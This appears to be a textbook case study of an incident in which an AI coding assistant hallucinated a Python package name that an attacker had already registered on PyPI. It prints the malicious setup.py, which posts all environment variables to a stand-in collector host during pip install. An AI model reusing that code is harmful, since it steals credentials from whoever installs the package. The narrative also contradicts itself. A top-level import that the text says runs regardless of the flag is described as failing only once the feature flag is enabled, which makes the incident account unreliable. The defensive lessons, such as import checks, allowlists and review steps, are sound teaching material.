Case Study 1: The Hallucinated Library

Incident Overview

Incident Type: Production deployment failure / dependency confusion
Severity: P1 (Critical)
Duration: 4 hours 23 minutes (from deployment to final resolution)
Impact: Complete service outage for the analytics dashboard; 2,300 users affected
Root Cause: AI-generated code imported a non-existent Python package whose name an attacker had already registered as a malicious package on PyPI
Date: A Wednesday afternoon, sprint deployment day

Background

Meridian Analytics is a mid-size data analytics company with a team of 12 developers. Six months ago, the team adopted AI coding assistants to accelerate feature development. The team had seen strong productivity gains and had developed a generally positive attitude toward AI-assisted development. Code review processes were in place, but AI-generated code was not subject to any special scrutiny beyond the standard review.

The team was building a new feature for their analytics dashboard: a real-time anomaly detection system that would flag unusual patterns in customer usage data. The feature required time-series analysis, statistical modeling, and integration with the existing notification pipeline.

The Development Phase

The Prompt

Senior developer Alex Chen was tasked with building the anomaly detection module. Alex had been using an AI coding assistant for three months and had become comfortable with the workflow. Alex prompted the assistant:

Build a Python module for real-time anomaly detection on time-series data. It should support configurable sensitivity levels, multiple detection algorithms (z-score, IQR, and isolation forest), and output structured alerts compatible with our notification system. Use appropriate libraries for statistical analysis.

The Generated Code

The AI assistant produced a well-structured module spanning approximately 200 lines. The code was clean, well-documented, and appeared to follow best practices. Here is a critical excerpt:

import numpy as np
import pandas as pd
from scipy import stats
from tsanomalydetect import TimeSeriesDetector, AnomalyConfig, AlertLevel
from dataclasses import dataclass, field
from typing import Optional
from datetime import datetime


@dataclass
class AnomalyAlert:
    """Structured alert for detected anomalies."""
    timestamp: datetime
    metric_name: str
    observed_value: float
    expected_range: tuple[float, float]
    severity: str
    algorithm: str
    confidence: float


class AnomalyDetectionEngine:
    """Real-time anomaly detection for time-series data."""

    def __init__(self, sensitivity: float = 0.95):
        self.sensitivity = sensitivity
        self.detector = TimeSeriesDetector(
            config=AnomalyConfig(
                window_size=100,
                alert_level=AlertLevel.MEDIUM,
                auto_calibrate=True
            )
        )
        self.history: dict[str, list[float]] = {}

    def detect_zscore(self, metric: str, value: float) -> Optional[AnomalyAlert]:
        """Detect anomalies using z-score method."""
        history = self.history.get(metric, [])
        if len(history) < 30:
            history.append(value)
            self.history[metric] = history
            return None

        mean = np.mean(history)
        std = np.std(history)
        z_score = abs((value - mean) / std) if std > 0 else 0

        threshold = stats.norm.ppf(self.sensitivity)

        history.append(value)
        self.history[metric] = history[-1000:]  # Keep last 1000 values

        if z_score > threshold:
            return AnomalyAlert(
                timestamp=datetime.now(),
                metric_name=metric,
                observed_value=value,
                expected_range=(mean - threshold * std, mean + threshold * std),
                severity="high" if z_score > threshold * 1.5 else "medium",
                algorithm="zscore",
                confidence=1 - stats.norm.sf(z_score) * 2
            )
        return None

    def detect_isolation_forest(self, metric: str, values: list[float]) -> list[AnomalyAlert]:
        """Detect anomalies using isolation forest via tsanomalydetect."""
        results = self.detector.fit_detect(
            series=np.array(values),
            metric_name=metric,
            return_scores=True
        )
        alerts = []
        for anomaly in results.anomalies:
            alerts.append(AnomalyAlert(
                timestamp=anomaly.timestamp,
                metric_name=metric,
                observed_value=anomaly.value,
                expected_range=anomaly.expected_bounds,
                severity=anomaly.severity.value,
                algorithm="isolation_forest",
                confidence=anomaly.confidence
            ))
        return alerts

The Review

The code went through a standard pull request review. Reviewer Jordan Patel noted:

  • Clean code structure with proper dataclasses
  • Good use of type hints
  • Reasonable algorithm implementation for z-score
  • Comprehensive docstrings

Jordan was unfamiliar with tsanomalydetect but assumed it was a legitimate library — the import looked professional, the API usage followed standard patterns (instantiate a detector, configure it, call fit_detect), and the code handled the return values as if the library used proper data classes. Jordan approved the PR with a comment: "Nice work, clean implementation. The tsanomalydetect integration looks solid."

No one ran pip install tsanomalydetect during review. No one checked PyPI. The CI/CD pipeline did not verify that all imports could be resolved.
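
A minimal sketch of the kind of check that was missing: statically collect the module names a file imports and ask importlib whether each one resolves in the current environment. This is an illustrative stand-alone function, not the team's actual tooling, but the same idea works as a CI step.

```python
import ast
import importlib.util

def unresolved_imports(source: str) -> set[str]:
    """Return top-level module names in `source` that cannot be resolved
    in the current environment."""
    missing = set()
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Import):
            names = [alias.name for alias in node.names]
        elif isinstance(node, ast.ImportFrom) and node.module and node.level == 0:
            names = [node.module]
        else:
            continue
        for name in names:
            root = name.split(".")[0]  # only the top-level package matters here
            if importlib.util.find_spec(root) is None:
                missing.add(root)
    return missing
```

Run against a source line such as `from tsanomalydetect import TimeSeriesDetector`, this returns `{"tsanomalydetect"}` in any environment where that package is not installed, which is exactly the state the CI runner was in.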

The Deployment

Wednesday, 2:14 PM — Deployment begins

The feature branch was merged into main. The CI/CD pipeline ran:

  1. Unit tests passed (they did not cover the detect_isolation_forest method — only detect_zscore was tested)
  2. Linting passed (the import was syntactically valid)
  3. Type checking was not configured for the project
  4. The Docker image was built successfully (the build did not run the code, so the missing import was not caught)
  5. Deployment to staging completed

Wednesday, 2:31 PM — Staging "validation"

A quick manual test of the dashboard showed the z-score detection working. The isolation forest feature was behind a feature flag and was not toggled on during staging validation.

Wednesday, 2:45 PM — Production deployment

The team deployed to production with the feature flag for isolation forest set to "off." The z-score-based detection worked correctly.

Wednesday, 3:30 PM — Feature flag enabled

Product manager Sara Kim enabled the isolation forest feature flag for a subset of enterprise customers, as planned.

Wednesday, 3:31 PM — Immediate failures

The anomaly detection service crashed on the first request that hit the isolation forest code path:

ModuleNotFoundError: No module named 'tsanomalydetect'

The error was caught by the service's exception handler, but since anomaly detection was integrated into the main data processing pipeline, the failure cascaded. The pipeline stalled, the analytics dashboard stopped updating, and alerts began firing.

Wednesday, 3:38 PM — Incident declared

On-call engineer Morgan Lee declared a P1 incident after confirming the dashboard was completely non-functional for affected customers.

Wednesday, 3:42 PM — Initial investigation

Morgan checked the error logs and found the ModuleNotFoundError. The immediate assumption was a missing dependency in the Docker image. Morgan checked requirements.txt; tsanomalydetect was not listed. Morgan then tried to install it:

pip install tsanomalydetect

The install succeeded. Morgan was relieved — until the service crashed again with a different error. The installed package was not the expected library. It was a nearly empty package with a suspicious setup.py:

# setup.py of the malicious 'tsanomalydetect' package
from setuptools import setup
import os
import requests

setup(
    name='tsanomalydetect',
    version='0.1.0',
    description='Time series anomaly detection toolkit',
    py_modules=['tsanomalydetect'],
)

# This code runs during pip install
try:
    env_data = {k: v for k, v in os.environ.items()}
    requests.post('https://collector.malicious-example.com/env',
                   json=env_data, timeout=5)
except Exception:
    pass

Wednesday, 3:58 PM — Scope escalation

Morgan realized that pip install tsanomalydetect had exfiltrated environment variables from the staging server, potentially including API keys and database credentials. The incident was escalated to include the security team.

Wednesday, 4:14 PM — Rollback

The team rolled back to the previous release. The dashboard resumed functioning. The security team began rotating all credentials that may have been exposed.

Wednesday, 6:37 PM — Incident resolved

All affected credentials were rotated. The malicious package was reported to the PyPI security team. The dashboard was confirmed functional. The incident was downgraded from P1 to monitoring status.


Root Cause Analysis

Proximate Cause

The AI coding assistant generated an import for tsanomalydetect, a library with no legitimate implementation. The hallucinated name was plausible, following Python naming conventions for a time-series anomaly detection package, and it was used with a convincing API that matched patterns common in scikit-learn-style libraries.

Contributing Factors

  1. No import verification in CI/CD. The build pipeline did not include a step to verify that all imports could actually be resolved. A simple python -c "import tsanomalydetect" step would have caught this immediately.

  2. No special review process for AI-generated code. The team treated AI-generated code the same as human-written code during review. There was no checklist item for "verify unfamiliar imports."

  3. Reviewer unfamiliarity accepted as normal. The reviewer saw an unfamiliar library and assumed it was legitimate rather than verifying it. In the context of Python's vast ecosystem, encountering unfamiliar libraries is common, creating a normalization of "I haven't heard of this library, but it probably exists."

  4. Incomplete test coverage. The unit tests only covered the z-score method. The isolation forest method (which contained the hallucinated import) was untested.

  5. Feature flag gave false safety. The team believed the feature flag made deployment safe. However, the feature flag only controlled the code path — the import statement at the top of the module executed regardless of the flag's state.

  6. Malicious package on PyPI. Someone had already registered tsanomalydetect on PyPI as a malicious package. Registering names that developers are likely to mistype, or that AI assistants are likely to hallucinate, is a known supply-chain attack pattern related to typosquatting and dependency confusion.
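
Contributing factors 1 and 4 share a cheap mitigation: a smoke test that simply executes every module. Even with no assertions, executing a module runs its top-level imports, so a hallucinated dependency surfaces immediately. The sketch below is an illustration of the idea, not the team's pipeline code.

```python
import importlib.util
import pathlib

def smoke_import(directory: str) -> dict[str, str]:
    """Execute every .py file under `directory` and collect failures.

    Executing a module runs its top-level import statements, so an
    unresolvable import (hallucinated or otherwise) shows up here even
    if no test ever calls into the module's functions.
    """
    failures = {}
    for path in sorted(pathlib.Path(directory).rglob("*.py")):
        spec = importlib.util.spec_from_file_location(path.stem, path)
        module = importlib.util.module_from_spec(spec)
        try:
            spec.loader.exec_module(module)
        except Exception as err:  # e.g. ModuleNotFoundError
            failures[path.name] = repr(err)
    return failures
```

A single `assert not smoke_import("src/")` in the test suite would have failed the build the moment the hallucinated import was committed, regardless of feature-flag state.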

Underlying Cause

The team lacked awareness that AI hallucination of package names is a common and well-documented failure mode. There was no organizational knowledge, process, or tooling in place to address this specific risk.


Impact Assessment

User impact: 2,300 enterprise users experienced a dashboard outage during the four-hour incident
Revenue impact: Estimated $18,000 in SLA credits to affected enterprise customers
Security impact: Environment variables exfiltrated from the staging server; all credentials rotated as a precaution
Engineering cost: ~40 person-hours for incident response, credential rotation, and process improvement
Reputation impact: Two enterprise customers flagged the incident in their quarterly review meetings

Remediation Actions

Immediate (completed within 48 hours)

  1. Removed the hallucinated import. Replaced tsanomalydetect with scikit-learn's IsolationForest implementation, which is a well-established, real library.

  2. Rotated all credentials. Every secret that may have been present in the staging server's environment was rotated.

  3. Reported the malicious package. Filed a report with the PyPI security team to have the malicious tsanomalydetect package removed.
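
A sketch of what the replacement in item 1 might look like using scikit-learn's real IsolationForest. The function shape and parameter values here are illustrative, not the team's production code.

```python
import numpy as np
from sklearn.ensemble import IsolationForest

def detect_anomalies(values: list[float], contamination: float = 0.01):
    """Flag anomalous points in a univariate series.

    Returns (index, value, score) tuples; a higher score means the
    point is more anomalous.
    """
    X = np.asarray(values, dtype=float).reshape(-1, 1)
    model = IsolationForest(contamination=contamination, random_state=0)
    labels = model.fit_predict(X)     # -1 = anomaly, 1 = normal
    scores = -model.score_samples(X)  # inverted so higher = more anomalous
    return [(i, values[i], float(scores[i]))
            for i in range(len(values)) if labels[i] == -1]
```

Beyond being real, scikit-learn was already an established transitive dependency of the team's stack, so the swap added no new supply-chain surface.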

Short-term (completed within 2 weeks)

  1. Added import verification to CI/CD. A new pipeline step runs python -c "import <module>" for every import in the codebase. Unresolvable imports fail the build.

  2. Implemented a dependency allowlist. New dependencies must be reviewed and added to an allowlist before they can be used. The allowlist includes PyPI URLs for verification.

  3. Updated code review checklist. Added "Verify all unfamiliar imports against official documentation or PyPI" as a mandatory review step.

  4. Required test coverage for all code paths. Any code path that is not covered by tests cannot be merged, regardless of feature flags.
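
To support items 2 and 3, a reviewer can pull a package's metadata from PyPI's public JSON API for inspection. Note that mere existence proves nothing (the malicious tsanomalydetect existed); the point is to surface the maintainer, release history, and project links for a human to judge. The `opener` parameter below is just dependency injection so the function can be exercised without network access; it is not part of any standard tooling.

```python
import json
import urllib.error
import urllib.request

def pypi_metadata(name: str, opener=urllib.request.urlopen):
    """Fetch a package's metadata from PyPI's JSON API, or None if absent.

    The returned "info" dict (maintainer, home page, summary, etc.) is
    what a reviewer should actually inspect before allowlisting.
    """
    url = f"https://pypi.org/pypi/{name}/json"
    try:
        with opener(url) as resp:
            return json.load(resp)["info"]
    except urllib.error.HTTPError as err:
        if err.code == 404:
            return None  # name not registered on PyPI at all
        raise
```

In the allowlist workflow, the fetched metadata is attached to the dependency's review ticket so the approval decision is auditable.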

Long-term (completed within 2 months)

  1. Adopted pip-audit in CI/CD. Automated scanning for known vulnerabilities in all dependencies.

  2. AI code review training. All developers completed a 2-hour training session on AI-specific failure modes, including hallucination, with hands-on exercises.

  3. Established an "AI Gotchas" shared document. A living document where team members record AI failure patterns they encounter, creating organizational memory.


Lessons Learned

What went well

  • The on-call engineer responded quickly and declared the incident appropriately
  • The rollback process worked smoothly
  • The security team's response to the credential exposure was swift and thorough

What went wrong

  • The hallucinated import was not caught at any stage: code generation, code review, CI/CD, staging, or production deployment
  • The team's trust in AI-generated code exceeded its verification practices
  • Feature flags were misunderstood as a safety net for untested code

Key takeaways

  1. Every unfamiliar import must be verified. If you have not personally used a library, confirm it exists on PyPI and check its download statistics, maintainership, and documentation.

  2. CI/CD must verify imports. A build that does not actually attempt to import all modules is an incomplete build.

  3. Feature flags do not protect against import-time failures. Python executes all top-level imports when a module is loaded, regardless of runtime feature flags.

  4. AI hallucination of packages is a security vector, not just a bug. Attackers actively register packages with hallucination-prone names.

  5. Test coverage is the last line of defense. If the isolation forest code path had been tested, the hallucinated import would have been caught immediately.
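
Takeaway 3 has a direct code-level fix: defer optional imports into the flagged code path so that the failure mode tracks the flag. A minimal sketch follows; the module-level dict stands in for a real feature-flag service, and the deliberately missing tsanomalydetect import reproduces the incident's failure.

```python
FEATURE_FLAGS = {"isolation_forest": False}  # stand-in for a real flag service

def detect_isolation_forest(values: list[float]) -> list:
    """Run the optional detector only when its feature flag is on."""
    if not FEATURE_FLAGS["isolation_forest"]:
        return []
    # Deferred import: a missing or hallucinated dependency now fails
    # here, inside the flagged path, instead of at module load time.
    import tsanomalydetect
    return list(tsanomalydetect.TimeSeriesDetector().fit_detect(values))
```

This does not make a missing dependency acceptable; it only ensures that the blast radius matches what the flag actually controls, so toggling the flag in staging exercises the same failure the flag would gate in production.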


Discussion Questions

  1. How would you modify your team's code review process to catch hallucinated imports without slowing down development velocity?

  2. The reviewer assumed the unfamiliar library was legitimate. What cognitive biases contributed to this assumption, and how can review processes be designed to counteract them?

  3. The feature flag gave the team a false sense of security. What other development practices create similar false confidence, and how can teams guard against this?

  4. Could a multi-model approach (having a second AI verify the first AI's code) have caught this issue? What are the limitations of that approach?

  5. The malicious package on PyPI was opportunistic — someone had registered the name before the incident. How should the Python ecosystem address the growing threat of AI-hallucination-driven dependency confusion?


This case study illustrates concepts from Section 14.2 (Hallucinated APIs and Libraries), Section 14.7 (The Confidence Problem), and Section 14.10 (Building Resilience). For import verification tools, see code/example-02-verification-tools.py.